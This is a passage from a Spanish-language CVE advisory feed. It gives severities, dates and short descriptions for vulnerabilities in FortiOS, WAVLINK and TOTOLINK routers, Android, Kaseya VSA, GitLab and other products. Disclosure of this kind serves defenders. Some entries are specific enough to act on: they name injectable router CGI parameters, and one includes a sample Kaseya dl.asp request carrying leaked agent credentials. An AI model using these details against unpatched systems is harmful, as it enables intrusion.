    Una vulnerabilidad de control de acceso inadecuado [CWE-284] en FortiOS versiones 6.2.0 a 6.2.11, 6.4.0 a 6.4.8 y 7.0.0 a 7.0.5, puede permitir a un atacante autenticado con un perfil de usuario restringido recopilar la información de la suma de comprobación sobre los otros VDOMs por medio de comandos CLI
  • CVE-2022-35779
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Azure RTOS GUIX Studio. Este ID de CVE es diferente de CVE-2022-30175, CVE-2022-30176, CVE-2022-34687, CVE-2022-35773, CVE-2022-35806
  • CVE-2022-35777
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Visual Studio. Este ID de CVE es diferente de CVE-2022-35825, CVE-2022-35826, CVE-2022-35827
  • CVE-2022-35773
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Azure RTOS GUIX Studio. Este ID de CVE es diferente de CVE-2022-30175, CVE-2022-30176, CVE-2022-34687, CVE-2022-35779, CVE-2022-35806
  • CVE-2022-35772
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-35824
  • CVE-2022-35766
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Secure Socket Tunneling Protocol (SSTP). Este ID de CVE es diferente de CVE-2022-34702, CVE-2022-34714, CVE-2022-35745, CVE-2022-35752, CVE-2022-35753, CVE-2022-35767, CVE-2022-35794
  • CVE-2022-27484
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2022
    Fecha de última actualización: 08/08/2023
    Un cambio de contraseña no verificado en Fortinet FortiADC versiones 6.2.0 hasta 6.2.3, 6.1.x, 6.0.x, 5.x.x, permite a un atacante autenticado omitir la comprobación de la contraseña antigua en el formulario de cambio de contraseña por medio de una petición HTTP diseñada
  • CVE-2022-30319
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    Saia Burgess Controls (SBC) PCD versiones hasta 06-05-2022, permite una omisión de la Autenticación. De acuerdo con FSCT-2022-0062, se presenta un problema de omisión de autenticación S-Bus de Saia Burgess Controls (SBC) PCD. Los componentes afectados son caracterizados como: Autenticación S-Bus (5050/UDP). El impacto potencial es: Omisión de Autenticación. Los controladores PCD de Saia Burgess Controls (SBC) usan el protocolo S-Bus (5050/UDP) para diversos fines de ingeniería. Es posible configurar una contraseña para restringir el acceso a la funcionalidad de ingeniería confidencial. La autenticación funciona sobre la base de una lista blanca de MAC/IP con tiempo de inactividad en la que es almacenada la MAC/IP de un cliente autenticado. El tráfico UDP puede ser falsificado para omitir el control de acceso basado en la lista blanca. Como el UDP no presenta estado, un atacante capaz de observar pasivamente el tráfico puede falsificar mensajes arbitrarios usando la MAC/IP de un cliente autenticado. Esto permite al atacante acceder a funciones de ingeniería confidenciales, como la carga/descarga de la lógica de control y la manipulación de la configuración del controlador
  • CVE-2022-30285
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/08/2022
    Fecha de última actualización: 08/08/2023
    En Quest KACE Systems Management Appliance (SMA) versiones hasta 12.0, es posible una colisión de hash durante la autenticación. Esto puede permitir la autenticación con credenciales no válidas
  • CVE-2022-35506
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TripleCross versión v0.1.0, contiene un desbordamiento de pila que es producido porque no se presenta límite en la longitud de los parámetros del programa
  • CVE-2022-35921
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 21/07/2023
    fof/byobu es una extensión de discusiones privadas para el foro Flarum. Se ha detectado que las versiones afectadas no respetan la deshabilitación de las discusiones privadas por parte de usuarios. Los usuarios de Byobu deben actualizar la extensión a versión 1.1.7, donde esto ha sido parcheado. Los usuarios de Byobu con Flarum vesiones 1.0 o 1.1 deben actualizar a Flarum versiones 1.2 o posteriores, o evaluar el impacto que este problema presenta en usuarios de su foro y optar por deshabilitar la extensión si es necesario. No se presentan mitigaciones conocidas para este problema
  • CVE-2022-34769
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    PROSCEND - PROSCEND / ADVICE .Ltd - Router Celular Industrial G/5G (con GPS)4 Inyección de comandos del SO no autentificados Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GWICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301
  • CVE-2022-1919
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 12/08/2023
    Un uso de memoria previamente liberada en Codecs en Google Chrome versiones anteriores a 101.0.4951.41, permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-1040
    Severidad: ALTA
    Fecha de publicación: 25/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de autenticación en el Portal de Usuarios y Webadmin permite a un atacante remoto ejecutar código en Sophos Firewall versiones v18.5 MR3 y anteriores
  • CVE-2021-43536
    Severidad: MEDIA
    Fecha de publicación: 08/12/2021
    Fecha de última actualización: 08/08/2023
    En determinadas circunstancias, las funciones asíncronas podrían haber causado el fallo de una navegación pero exponiendo la URL de destino. Esta vulnerabilidad afecta a Thunderbird versiones anteriores a 91.4.0, Firefox ESR versiones anteriores a 91.4.0 y Firefox versiones anteriores a 95
  • CVE-2022-36267
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2022
    Fecha de última actualización: 08/08/2023
    En Airspan AirSpot 5410 versiones 0.3.4.1-4 y anteriores, se presenta una vulnerabilidad de inyección de comandos remotos no autenticados. La funcionalidad de ping puede ser llamada sin autenticación del usuario cuando se diseña una petición http maliciosa al inyectar código en uno de los parámetros permitiendo una ejecución de código remoto. Esta vulnerabilidad es explotada por medio del archivo binario /home/www/cgi-bin/diagnostics.cgi que acepta peticiones no autenticadas y datos no saneados. Como resultado, un actor malicioso puede diseñar una petición específica e interactuar remotamente con el dispositivo
  • CVE-2022-22411
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Scale Data Access Services (DAS) versión 5.1.3.1, podría permitir a un usuario autenticado insertar código que podría permitir al atacante manipular los recursos del clúster debido a un exceso de permisos. IBM X-Force ID: 223016
  • CVE-2022-37002
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    El módulo SystemUI presenta una vulnerabilidad de escalada de privilegios. Una explotación con éxito de esta vulnerabilidad puede causar que aplicaciones maliciosas abran ventanas o sean ejecutadas en segundo plano
  • CVE-2022-35538
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo wireless.cgi no presenta filtro en los parámetros: delete_list, delete_al_mac, b_delete_list y b_delete_al_mac, lo que conlleva a una inyección de comandos en la página /wifi_mesh.shtml
  • CVE-2022-35537
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo wireless.cgi no presenta filtro en los parámetros: mac_5g y Newname, lo que conlleva a una inyección de comandos en la página /wifi_mesh.shtml
  • CVE-2022-35536
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo qos.cgi no filtra los parámetros: qos_bandwith y qos_dat, lo que conlleva una inyección de comandos en la página /qos.shtml
  • CVE-2022-35535
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo wireless.cgi no presenta ningún filtro en el parámetro macAddr, lo que conlleva a una inyección de comandos en la página /wifi_mesh.shtml
  • CVE-2022-35534
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo wireless.cgi no presenta ningún filtro en el parámetro hiddenSSID32g y SSID2G2, lo que conlleva a una inyección de comandos en la página /wifi_multi_ssid.shtml
  • CVE-2022-35533
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo qos.cgi no presenta ningún filtro en los parámetros: cli_list y cli_num, lo que conlleva a una inyección de comandos en la página /qos.shtml
  • CVE-2022-35526
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo login.cgi no presenta ningún filtro en el parámetro key, lo que conlleva a una inyección de comandos en la página /login.shtml
  • CVE-2022-35525
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo adm.cgi no presenta ningún filtro en el parámetro led_switch, lo que conlleva a una inyección de comandos en la página /ledonoff.shtml
  • CVE-2022-35524
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo adm.cgi no presenta ningún filtro en los parámetros: wlan_signal, web_pskValue, sel_EncrypTyp, sel_Automode, wlan_bssid, wlan_ssid y wlan_channel, lo que conlleva a una inyección de comandos en la página /wizard_rep.shtml
  • CVE-2022-35523
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo firewall.cgi no presenta filtro en el parámetro del_mac y en el parámetro flag, lo que conlleva a una inyección de comandos en la página /cli_black_list.shtml
  • CVE-2022-35522
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo adm.cgi no presenta ningún filtro en los parámetros: ppp_username, ppp_passwd, rwan_gateway, rwan_mask y rwan_ip, lo que conlleva a una inyección de comandos en la página /wan.shtml
  • CVE-2022-35521
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo firewall.cgi no presenta filtros en los parámetros: remoteManagementEnabled, blockPortScanEnabled, pingFrmWANFilterEnabled y blockSynFloodEnabled, lo que conlleva a una inyección de comandos en la página /man_security.shtml
  • CVE-2022-35520
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo api.cgi no presenta filtro en el parámetro ufconf, y éste es un parámetro oculto que no aparece en el cuerpo del POST, pero se presenta en el binario del cgi. Esto conlleva a una inyección de comandos en la página /ledonoff.shtml
  • CVE-2022-35519
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo firewall.cgi no presenta filtro en el parámetro add_mac, lo que conlleva a una inyección de comandos en la página /cli_black_list.shtml
  • CVE-2022-35518
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo nas.cgi no presenta ningún filtro en los parámetros: User1Passwd y User1, lo que conlleva a una inyección de comandos en la página /nas_disk.shtml
  • CVE-2022-35517
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN572HP3, WN533A8, WN530H4, WN535G3, WN531P3, el archivo adm.cgi no presenta filtros en los parámetros: web_pskValue, wl_Method, wlan_ssid, EncrypType, rwan_ip, rwan_mask, rwan_gateway, ppp_username, ppp_passwd y ppp_setver, lo que conlleva a una inyección de comandos en la página /wizard_router_mesh.shtml
  • CVE-2022-31675
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    VMware vRealize Operations contiene una vulnerabilidad de omisión de autenticación. Un actor malicioso no autenticado con acceso a la red puede ser capaz de crear un usuario con privilegios administrativos
  • CVE-2022-31673
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    VMware vRealize Operations contiene una vulnerabilidad de divulgación de información. Un actor malicioso poco privilegiado y acceso a la red puede crear y filtrar volcados hexadecimales, conllevando a una divulgación de información. Una explotación con éxito puede conllevar a una ejecución de código remota
  • CVE-2022-31672
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    VMware vRealize Operations contiene una vulnerabilidad de escalada de privilegios. Un actor malicioso con acceso administrativo a la red puede escalar los privilegios a root
  • CVE-2022-25793
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de desbordamiento del búfer en la región Stack de la memoria en Autodesk 3ds Max versiones 2022, 2021 y 2020, puede conllevar a una ejecución de código mediante la falta de comprobación apropiada de la longitud de los datos suministrados por el usuario antes de copiarlos en un búfer en la región stack de la memoria de longitud fija cuando son analizados archivos de código de bytes de ActionScript. Esta vulnerabilidad puede permitir la ejecución de código arbitrario en las instalaciones afectadas de Autodesk 3ds Max
  • CVE-2022-20360
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En la función setChecked del archivo SecureNfcPreferenceController.java, falta una comprobación de permisos. Esto podría conllevar a una escalada local de privilegios desde el usuario invitado sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-228314987
  • CVE-2022-20358
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En la función startSync del archivo AbstractThreadedSyncAdapter.java, se presenta una posible forma de acceder al contenido protegido de los proveedores de contenido debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-203229608
  • CVE-2022-20357
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En la función writeToParcel del archivo SurfaceControl.cpp, se presenta una posible divulgación de información debido a datos no inicializados. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12 Android-12L, ID de Android: A-214999987
  • CVE-2022-20352
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En la función addProviderRequestListener del archivo LocationManagerService.java, se presenta una posible forma de conocer los paquetes que solicitan información de localización debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12 Android-12L, ID de Android: A-222473855
  • CVE-2022-20349
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En las funciones WifiScanningPreferenceController y BluetoothScanningPreferenceController, se presenta una posible omisión de las restricciones de administración debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-228315522
  • CVE-2022-20348
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/08/2022
    Fecha de última actualización: 08/08/2023
    En la función updateState del archivo LocationServicesWifiScanningPreferenceController.java, se presenta una posible omisión de la restricción de administración debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-228315529
  • CVE-2022-24687
    Severidad: BAJA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Los clusters de HashiCorp Consul y Consul Enterprise versiones 1.9.0 a 1.9.14, 1.10.7 y 1.11.2 con al menos un Ingress Gateway permiten que un usuario con service:write registre un servicio específicamente definido que puede hacer que los servidores de Consul entren en pánico. Corregido en las versiones 1.9.15, 1.10.8 y 1.11.3
  • CVE-2022-24684
    Severidad: MEDIA
    Fecha de publicación: 15/02/2022
    Fecha de última actualización: 08/08/2023
    HashiCorp Nomad y Nomad Enterprise versiones 0.9.0 hasta 1.0.16, 1.1.11 y 1.2.5 permiten a los operadores con capacidades de envío de trabajos utilizar la estrofa de propagación para hacer entrar en pánico a los agentes del servidor. Corregido en las versiones 1.0.18, 1.1.12 y 1.2.6.
  • CVE-2022-32045
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro desc en la función FUN_00413be4
  • CVE-2022-32044
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro password en la función FUN_00413f80
  • CVE-2022-32046
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro desc en la función FUN_0041880c
  • CVE-2022-32047
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro desc en la función FUN_00412ef4
  • CVE-2022-32048
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro command en la función FUN_0041cc88
  • CVE-2022-32049
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro url en la función FUN_00418540
  • CVE-2022-32050
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro cloneMac en la función FUN_0041af40
  • CVE-2022-32051
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio de los parámetros desc, week, sTime, eTime en la función FUN_004133c4
  • CVE-2022-32052
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro desc en la función FUN_004137a4
  • CVE-2022-32053
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK T6 versión V4.1.9cu.5179_B20201015, contiene un desbordamiento de pila por medio del parámetro cloneMac en la función FUN_0041621c
  • CVE-2022-32037
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 versión V1.0.0.12, contiene un desbordamiento de pila por medio de la función formSetAPCfg
  • CVE-2022-32039
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 versión V1.0.0.12, contiene un desbordamiento de pila por medio del parámetro listN en la función fromDhcpListClient
  • CVE-2022-32043
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 versión V1.0.0.12, contiene un desbordamiento de pila por medio de la función formSetAccessCodeInfo
  • CVE-2022-32041
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 versión V1.0.0.12, contiene un desbordamiento de pila por medio de la función formGetPassengerAnalyseData
  • CVE-2022-32040
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 versión V1.0.0.12, contiene un desbordamiento de pila por medio de la función formSetCfm
  • CVE-2021-1647
    Severidad: ALTA
    Fecha de publicación: 12/01/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota de Microsoft Defender
  • CVE-2021-22991
    Severidad: MEDIA
    Fecha de publicación: 31/03/2021
    Fecha de última actualización: 08/08/2023
    En BIG-IP versiones 16.0.x anteriores a 16.0.1.1, versiones 15.1.x anteriores a 15.1.2.1, versiones 14.1.x anteriores a 14.1.4, versiones 13.1.x anteriores a 13.1.3.6 y versiones 12.1.x anteriores a 12.1.5.3, unas peticiones no reveladas a un servidor virtual pueden ser manejadas incorrectamente por la normalización del URI de Traffic Management Microkernel (TMM), lo que puede desencadenar un desbordamiento del búfer, resultando en un ataque de DoS. En determinadas situaciones, teóricamente puede permitir la omisión del control de acceso basado en URL o una ejecución de código remota (RCE). Nota: No se evalúan las versiones de software que han alcanzado End of Software Development (EoSD).
  • Vulnerabilidad en Microsoft SharePoint (CVE-2021-26418)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft SharePoint. Este ID de CVE es diferente de CVE-2021-28478, CVE-2021-31172
  • CVE-2021-28474
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft SharePoint Server
  • CVE-2021-30116
    Severidad: ALTA
    Fecha de publicación: 09/07/2021
    Fecha de última actualización: 08/08/2023
    Kaseya VSA antes de la versión 9.5.7 permite la divulgación de credenciales, como se explotó en la naturaleza en julio de 2021. Por defecto, Kaseya VSA on premise ofrece una página de descarga donde se pueden descargar los clientes para la instalación. La URL por defecto para esta página es https://x.x.x.x/dl.asp. Cuando un atacante descarga un cliente para Windows y lo instala, se genera el archivo KaseyaD.ini (C:\aArchivos de Programa (x86)\aKaseyaXXXXXX\aKaseyaD.ini) que contiene un Agent_Guid y AgentPassword. Este Agent_Guid y AgentPassword pueden ser utilizados para iniciar sesión en dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9). Esta solicitud autentifica al cliente y devuelve una cookie sessionId que puede ser utilizada en ataques posteriores para evadir la autenticación. Problemas de seguridad descubiertos --- * La página de descarga no autenticada filtra credenciales * Las credenciales del software del agente pueden ser usadas para obtener un sessionId (cookie) que puede ser usado para servicios no destinados a ser usados por los agentes * dl.asp acepta credenciales a través de una solicitud GET * El acceso a KaseyaD.ini le da a un atacante acceso a suficiente información para penetrar la instalación de Kaseya y sus clientes. Impacto --- A través de la página /dl.asp se puede obtener suficiente información para dar a un atacante un sessionId que puede ser usado para ejecutar más ataques (semiautenticados) contra el sistema
  • CVE-2021-35211
    Severidad: ALTA
    Fecha de publicación: 14/07/2021
    Fecha de última actualización: 08/08/2023
    Microsoft descubrió una vulnerabilidad de ejecución de código remota (RCE) en el producto SolarWinds Serv-U usando una Vulnerabilidad de Escape de Memoria Remota. Si es explotado, un actor de la amenaza puede ser capaz de obtener acceso privilegiado a la máquina que aloja Serv-U solamente. SolarWinds Serv-U Managed File Transfer y Serv-U Secure FTP para Windows versiones anteriores a 15.2.3 HF2 están afectados por esta vulnerabilidad
  • Vulnerabilidad en el módulo fingerprint (CVE-2021-40006)
    Severidad: BAJA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 13/08/2023
    El módulo fingerprint presenta un riesgo de seguridad de cracking por fuerza bruta. Una explotación con éxito de esta vulnerabilidad puede afectar la confidencialidad de los datos
  • CVE-2021-40476
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows AppContainer
  • CVE-2021-42292
    Severidad: MEDIA
    Fecha de publicación: 10/11/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de Funcionalidades de Seguridad de Microsoft Excel
  • CVE-2021-44077
    Severidad: ALTA
    Fecha de publicación: 29/11/2021
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine ServiceDesk Plus versiones anteriores a 11306, ServiceDesk Plus MSP versiones anteriores a 10530, y SupportCenter Plus versiones anteriores a 11014, son vulnerables a una ejecución de código remota no autenticada. Esto está relacionado con las URLs /RestAPI en un servlet, y con ImportTechnicians en la configuración de Struts
  • CVE-2022-25758
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete scss-tokenizer son vulnerables a la Denegación de Servicio por Expresión Regular (ReDoS) por medio de la función loadAnnotation(), debido al uso de regex no seguro
  • CVE-2021-41506
    Severidad: ALTA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    Xiaongmai AHB7008T-MH-V2, AHB7804R-ELS, AHB7804R-MH-V2, AHB7808R-MS-V2, AHB7808R-MS, AHB7808T-MS-V2, AHB7804R-LMS, HI3518_50H10L_S39 V4.02.R11.7601.Nat.Onvif.20170420, V4.02.R11.Nat.Onvif.20160422, V4.02.R11.7601.Nat.Onvif.20170424, V4.02.R11.Nat.Onvif.20170327, V4.02.R11.Nat.Onvif.20161205, V4.02.R11.Nat.20170301, V4.02.R12.Nat.OnvifS.20170727 está afectado por un backdoor en los binarios macGuarder y dvrHelper del firmware de las cámaras DVR/NVR/IP debido a credenciales estáticas de la cuenta root en el sistema
  • CVE-2022-25900
    Severidad: ALTA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete git-clone son vulnerables a una inyección de comandos debido al uso inseguro de la función --upload-pack de git
  • CVE-2022-2244
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de autorización inapropiada en GitLab EE/CE afectando a todas las versiones desde la 14.8 anteriores a 14.10.5, la 15.0 anteriores a 15.0.4 y la 15.1 anteriores a 15.1.1, permite a miembros del proyecto con rol de reportero administrar problemas en la funcionalidad project's error tracking
  • CVE-2022-2229
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de autorización inapropiada en GitLab CE/EE afectando a todas las versiones desde la 13.7 anteriores a 14.10.5, la 15.0 anteriores a 15.0.4 y la 15.1 anteriores a 15.1.1 permite a un atacante extraer el valor de una variable no protegida de la que conoce el nombre en proyectos públicos o privados de los que es miembro
  • CVE-2022-1954
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio por Expresiones Regulares en GitLab CE/EE que afecta a todas las versiones desde la 1.0.2 anteriores a 14.10.5, la 15.0 anteriores a 15.0.4 y la 15.1 anteriores a 15.1.1, permite a un atacante hacer inaccesible una instancia de GitLab por medio de encabezados de respuesta del servidor web especialmente diseñadas
  • CVE-2021-36666
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Druva versión 6.9.0 para MacOS, que permite a atacantes conseguir privilegios locales escalados por medio de inSyncDecommission
  • CVE-2022-20217
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una emisión no autorizada en la función SprdContactsProvider. Una aplicación de terceros podría usar este problema para eliminar el contacto Fdn. Producto: Android, Versiones: Android SoC, ID de Android: A-232441378
  • CVE-2022-30181
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
